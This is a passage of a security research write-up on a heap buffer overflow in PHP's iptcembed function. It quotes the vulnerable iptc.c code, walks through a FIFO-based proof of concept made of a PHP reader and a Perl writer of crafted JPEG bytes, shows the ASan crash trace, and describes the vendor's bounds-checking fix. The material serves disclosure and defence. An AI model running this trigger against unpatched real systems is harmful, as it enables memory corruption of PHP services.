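    if (fstat(fds[0], &sb) != 0) {
        close(fds[0]);
        return -1;
    }
    *is_fifo = S_ISFIFO(sb.st_mode) ? 1 : 0;
    *reported = (long long)sb.st_size;    /* the "measure once" value */

    *readable = 0;
    while ((r = read(fds[0], buf, sizeof buf)) > 0)   /* "read forever" */
        *readable += (size_t)r;
    close(fds[0]);
    return 0;
}
```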

The execution looks as follows:

The iptcembed function calls fstat and allocates spoolbuf with a size equal to the sum of the overhead data and sb.st_size.
poi is the current write position within spoolbuf; it advances by one for every byte written.
On the M_APP13 and M_SOS branches, the parser stops inserting markers and simply reads the remaining data until EOF, copying everything into spoolbuf. If the stream is longer than the allocated buffer, a heap out-of-bounds (OOB) write occurs.

Below is the point where the buffer size is strictly tied to st_size.

php-src/ext/standard/iptc.c, PHP_FUNCTION(iptcembed)

...
  if (spool < 2) {
    if (zend_fstat(fileno(fp), &sb) != 0) {
      fclose(fp);
      RETURN_FALSE;
    }

    spoolbuf = zend_string_safe_alloc(1, iptcdata_len + sizeof(psheader) + 1024 + 1, sb.st_size, 0); // Allocate the output buffer for the future JPEG: base (iptc + psheader + reserve) + sb.st_size (expected input size)
    poi = (unsigned char*)ZSTR_VAL(spoolbuf);
    memset(poi, 0, iptcdata_len + sizeof(psheader) + sb.st_size + 1024 + 1);
  }
...
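The size of this allocation can be worked out by hand for iptcembed("A", "/tmp/pipe.jpg") on a FIFO (iptcdata_len = 1, st_size = 0). The sketch below encodes our assumptions: a 64-bit build where the zend_string header is 24 bytes, 8-byte rounding for ZEND_MM_ALIGNED_SIZE, and the psheader literal as we recall it from iptc.c (29 bytes including the trailing NUL). The helper names are hypothetical. Under these assumptions the result, 1087 bytes, matches the region size in the ASan report in the Exploitation section.

```c
#include <stddef.h>

/* psheader as we recall it from ext/standard/iptc.c; check your checkout.
 * sizeof includes the trailing NUL. "\08BIM" is "\0" followed by "8BIM". */
static const char psheader[] = "\xFF\xED\0\0Photoshop 3.0\08BIM\x04\x04\0\0\0\0";

/* Assumptions for a 64-bit build: zend_string header (refcount/type info,
 * hash, length) is 24 bytes; ZEND_MM_ALIGNED_SIZE rounds up to 8. */
#define ZSTR_HEADER_SIZE ((size_t)24)
#define ALIGN8(x) (((x) + 7) & ~(size_t)7)

/* Bytes requested by zend_string_safe_alloc(1, m, st_size, 0), where
 * m = iptcdata_len + sizeof(psheader) + 1024 + 1:
 * n * m + aligned(header + st_size + 1). */
static size_t spoolbuf_alloc_size(size_t iptcdata_len, size_t st_size)
{
    size_t m = iptcdata_len + sizeof(psheader) + 1024 + 1;
    return 1 * m + ALIGN8(ZSTR_HEADER_SIZE + st_size + 1);
}

/* Bytes poi can write, starting at ZSTR_VAL(spoolbuf), before leaving the block. */
static size_t spoolbuf_capacity(size_t iptcdata_len, size_t st_size)
{
    return spoolbuf_alloc_size(iptcdata_len, st_size) - ZSTR_HEADER_SIZE;
}
```

So poi can advance only 1063 bytes past ZSTR_VAL(spoolbuf) before it leaves the block; the 8 MB written by the Perl one-liner in the Exploitation section overruns it by a wide margin.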

As the read operation progresses, poi advances, and bytes are written without checking the buffer bounds.

php-src/ext/standard/iptc.c, php_iptc_get1()

...
static int php_iptc_get1(FILE *fp, int spool, unsigned char **spoolbuf)
{
  int c;
  char cc;

  c = getc(fp);

  if (c == EOF) return EOF;

  if (spool > 0) {
    cc = c;
    PUTC(cc);
  }

  if (spoolbuf) *(*spoolbuf)++ = c; // Vulnerable operation: writing a byte and incrementing the pointer without checking for the end of spoolbuf

  return c;
}
...

The function responsible for reading the remainder simply repeats php_iptc_get1 until EOF is reached—this is inherently dangerous if st_size does not correspond to the actual volume of input data.

php-src/ext/standard/iptc.c, php_iptc_read_remaining()

static int php_iptc_read_remaining(FILE *fp, int spool, unsigned char **spoolbuf)
{
  while (php_iptc_get1(fp, spool, spoolbuf) != EOF) continue;

  return M_EOI;
}

It is in the M_APP13 and M_SOS branches that the parser switches to a mode where it copies data until the end of the stream.

php-src/ext/standard/iptc.c, PHP_FUNCTION(iptcembed)

...
    switch (marker) {
      case M_APP13:
        /* we are going to write a new APP13 marker, so don't output the old one */
        php_iptc_skip_variable(fp, 0, 0);
        fgetc(fp); /* skip already copied 0xFF byte */
        php_iptc_read_remaining(fp, spool, poi?&poi:0);
        done = 1;
        break;

      ...
      case M_SOS:
        /* we hit data, no more marker-inserting can be done! */
        php_iptc_read_remaining(fp, spool, poi?&poi:0);
        done = 1;
        break;
...

When reading from a FIFO (st_size == 0) or if the file grows after fstat, the copying loop continues to advance poi beyond the allocated string, resulting in a heap buffer overflow.
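A defensive alternative to trusting the fstat() estimate is to check capacity on every write. The sketch below is our illustration of that pattern, not the fix merged into php-src: struct spool, spool_put, and spool_read_remaining are hypothetical, and the buffer grows with realloc instead of being sized once up front.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical growable output buffer (not a php-src type). */
struct spool {
    unsigned char *buf;
    size_t len, cap;
};

/* Append one byte, growing the buffer when full instead of trusting a size
 * measured earlier. Returns 0 on success, -1 on allocation failure. */
static int spool_put(struct spool *s, unsigned char c)
{
    if (s->len == s->cap) {
        if (s->cap > SIZE_MAX / 2)
            return -1;
        size_t ncap = s->cap ? s->cap * 2 : 64;
        unsigned char *nbuf = realloc(s->buf, ncap);
        if (!nbuf)
            return -1;
        s->buf = nbuf;
        s->cap = ncap;
    }
    s->buf[s->len++] = c;
    return 0;
}

/* Bounds-checked counterpart of php_iptc_read_remaining(): copy until EOF. */
static int spool_read_remaining(FILE *fp, struct spool *s)
{
    int c;
    while ((c = getc(fp)) != EOF)
        if (spool_put(s, (unsigned char)c) != 0)
            return -1;
    return 0;
}
```

Starting from a 16-byte buffer (a stand-in for an undersized st_size estimate), copying a 10,000-byte file leaves s.len == 10000 with every write inside the allocation.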

Exploitation

To demonstrate the issue in the iptcembed function, we used a two-terminal setup:

1. Terminal A: reader; one-line PHP script.

reader, PHP

$ mkfifo /tmp/pipe.jpg
$ USE_ZEND_ALLOC=0 ASAN_OPTIONS=detect_leaks=0:abort_on_error=1 ./php -n -r 'var_dump(iptcembed("A", "/tmp/pipe.jpg"));'

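Note: USE_ZEND_ALLOC=0 disables the Zend memory manager so that emalloc falls back to the system allocator and ASan can track each allocation. In debug builds (--enable-debug), the process may abort early in zend_string_truncate before ASan reports the overflow.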

2. Terminal B: writer; one-line Perl script.

writer, Perl

perl -e 'binmode STDOUT; print "\xFF\xD8"; print "\xFF\xE0\x00\x10","JFIF", "\x00"x9; print "\xFF\xDA\x00\x08", "\x00"x6; print "A" x (8*1024*1024);' > /tmp/pipe.jpg

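Once the writer starts, the PHP process in Terminal A aborts with an ASan heap-buffer-overflow report, confirming the out-of-bounds write. Note that in this run the write is reported inside php_iptc_next_marker, which, as the trace shows, also writes into spoolbuf through php_iptc_get1: it is the same unchecked write, reached from the marker-scanning code rather than from php_iptc_read_remaining.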

Stack trace

$ mkfifo /tmp/pipe.jpg
$ USE_ZEND_ALLOC=0 ASAN_OPTIONS=detect_leaks=0:abort_on_error=1 ./php -n -r 'var_dump(iptcembed("A", "/tmp/pipe.jpg"));'
=================================================================
==9252==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5190000013bf at pc 0x5b2f1c1f2ee1 bp 0x7ffcebb8db20 sp 0x7ffcebb8db10
WRITE of size 1 at 0x5190000013bf thread T0
    #0 0x5b2f1c1f2ee0 in php_iptc_get1 /home/administrator/php/php-src/ext/standard/iptc.c:102
    #1 0x5b2f1c1f3085 in php_iptc_next_marker /home/administrator/php/php-src/ext/standard/iptc.c:150
    #2 0x5b2f1c1f3eaf in zif_iptcembed /home/administrator/php/php-src/ext/standard/iptc.c:233
    #3 0x5b2f1c674736 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/administrator/php/php-src/Zend/zend_vm_execute.h:1421
    #4 0x5b2f1c7d99a8 in execute_ex /home/administrator/php/php-src/Zend/zend_vm_execute.h:116441
    #5 0x5b2f1c7eeb33 in zend_execute /home/administrator/php/php-src/Zend/zend_vm_execute.h:121924
    #6 0x5b2f1c63cc8a in zend_eval_stringl /home/administrator/php/php-src/Zend/zend_execute_API.c:1367
    #7 0x5b2f1c63d0f6 in zend_eval_stringl_ex /home/administrator/php/php-src/Zend/zend_execute_API.c:1409
    #8 0x5b2f1c63d193 in zend_eval_string_ex /home/administrator/php/php-src/Zend/zend_execute_API.c:1419
    #9 0x5b2f1c9582e9 in do_cli /home/administrator/php/php-src/sapi/cli/php_cli.c:981
    #10 0x5b2f1c95a6fb in main /home/administrator/php/php-src/sapi/cli/php_cli.c:1362
    #11 0x7a0b6142a3b7 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #12 0x7a0b6142a47a in __libc_start_main_impl ../csu/libc-start.c:360
    #13 0x5b2f1b607024 in _start (/home/administrator/php/php-src/sapi/cli/php+0x607024) (BuildId: 79a1814231dec065dd21d5d0773d8bc9cffa79a0)

0x5190000013bf is located 0 bytes after 1087-byte region [0x519000000f80,0x5190000013bf)
allocated by thread T0 here:
    #0 0x7a0b61afd9c7 in malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:69
    #1 0x5b2f1c5399b8 in __zend_malloc /home/administrator/php/php-src/Zend/zend_alloc.c:3543
    #2 0x5b2f1c53587e in _emalloc /home/administrator/php/php-src/Zend/zend_alloc.c:2780
    #3 0x5b2f1c535c24 in _safe_emalloc /home/administrator/php/php-src/Zend/zend_alloc.c:2824
    #4 0x5b2f1c1f1dfb in zend_string_safe_alloc /home/administrator/php/php-src/Zend/zend_string.h:178
    #5 0x5b2f1c1f3b8c in zif_iptcembed /home/administrator/php/php-src/ext/standard/iptc.c:211
    #6 0x5b2f1c674736 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/administrator/php/php-src/Zend/zend_vm_execute.h:1421
    #7 0x5b2f1c7d99a8 in execute_ex /home/administrator/php/php-src/Zend/zend_vm_execute.h:116441
    #8 0x5b2f1c7eeb33 in zend_execute /home/administrator/php/php-src/Zend/zend_vm_execute.h:121924
    #9 0x5b2f1c63cc8a in zend_eval_stringl /home/administrator/php/php-src/Zend/zend_execute_API.c:1367
    #10 0x5b2f1c63d0f6 in zend_eval_stringl_ex /home/administrator/php/php-src/Zend/zend_execute_API.c:1409
    #11 0x5b2f1c63d193 in zend_eval_string_ex /home/administrator/php/php-src/Zend/zend_execute_API.c:1419
    #12 0x5b2f1c9582e9 in do_cli /home/administrator/php/php-src/sapi/cli/php_cli.c:981
    #13 0x5b2f1c95a6fb in main /home/administrator/php/php-src/sapi/cli/php_cli.c:1362
    #14 0x7a0b6142a3b7 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #15 0x7a0b6142a47a in __libc_start_main_impl ../csu/libc-start.c:360
    #16 0x5b2f1b607024 in _start (/home/administrator/php/php-src/sapi/cli/php+0x607024) (BuildId: 79a1814231dec065dd21d5d0773d8bc9cffa79a0)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/administrator/php/php-src/ext/standard/iptc.c:102 in php_iptc_get1

This is a brief two-terminal scenario: we construct a JPEG structure that drives the parser into copying the stream until EOF, and then keep feeding bytes so that the copy runs past the end of the buffer.

Why a FIFO and two terminals?

For a FIFO, st_size == 0, so the allocated spoolbuf is far too small. For a regular file, st_size matches the file size at the time of fstat, which usually prevents the overflow unless the file grows concurrently.
Opening a FIFO for reading blocks until a writer opens it, which is why two terminals are required.
The writer controls how much data arrives after the buffer has been allocated, so a sufficiently large tail guarantees the overflow.

Why these specific JPEG bytes?

FF D8 (SOI) marks the beginning of the JPEG.
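FF E0 00 10 + “JFIF” + 9 null bytes is meant to form a minimal APP0 (JFIF) segment with a declared length of 16 (2 bytes for the length field + 14 bytes of payload). This makes the parser accept the file and follow the APP0 path (the code expects APP0 to be present). Note that “JFIF” plus 9 null bytes is only 13 bytes, so php_iptc_skip_variable also consumes the FF byte that opens the next marker.
FF DA 00 08 + 6 null bytes is intended as a minimal start of scan (SOS) segment: after SOS, the code calls php_iptc_read_remaining and copies the rest of the stream into spoolbuf until EOF without checking its capacity. Because of the one-byte shortfall above, the DA byte is no longer preceded by FF, so php_iptc_next_marker keeps scanning for an FF byte and copies everything it skips into spoolbuf instead, which is consistent with frame #1 (php_iptc_next_marker) of the stack trace. Either way, the stream is copied into spoolbuf without a capacity check.
The 8 MiB tail of A bytes guarantees that far more data is copied than the undersized buffer can hold.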

Why does the default spool value matter?

In the iptcembed function, spool defaults to 0, so spoolbuf is allocated and filled. If spool >= 2, spoolbuf is not used and the function returns TRUE instead of a string; in that case, the heap buffer overflow does not occur.

Fix

The vendor committed a fix on November 26, 2025.

A spoolbuf_end parameter was added to the php_iptc_get1 and php_iptc_put1 functions (which append bytes to spoolbuf) and their call chains to enforce bounds checking. Instead of writing out of bounds, these functions now safely return EOF when the buffer is full.

Fix in the php-src/ext/standard/iptc.c file

if (spoolbuf) {
  if (UNEXPECTED(*spoolbuf >= spoolbuf_end)) {
    return EOF;
  }
  *(*spoolbuf)++ = c;
}

Consequently, if the buffer fills up before EOF, reading or copying stops early and the result may be truncated, but no memory corruption occurs. In iptcembed, the spoolbuf boundary is computed from the length of the allocated string.

Fix in the php-src/ext/standard/iptc.c file

spoolbuf_end = poi + ZSTR_LEN(spoolbuf);

An error path (goto err) was also added for write operations. If php_iptc_put1 returns EOF because spoolbuf is full, iptcembed jumps to the err label, frees the allocated memory, and returns FALSE rather than producing a corrupted result. Before zend_string_truncate is called, a terminating null byte is written explicitly (*poi = '\0';) so that the string stays properly terminated even if reading stops early because the buffer is full.

Conclusion

In this article, we looked “under the hood” of PHP using the ext/standard extension as an example, focusing on image processing and the related heap memory bugs. We demonstrated that behind familiar native functions lies C code that directly processes untrusted data.

Our analysis confirmed that even in mature components, such code segments remain a source of vulnerabilities. Specifically, we analyzed a memory disclosure in getimagesize (CVE-2025-14177) and a heap buffer overflow in iptcembed. Both issues have now been patched, but their existence underscores the importance of auditing low-level mechanisms, especially where external data formats are parsed.

🐘 Thank you for reading this research, and see you next time!
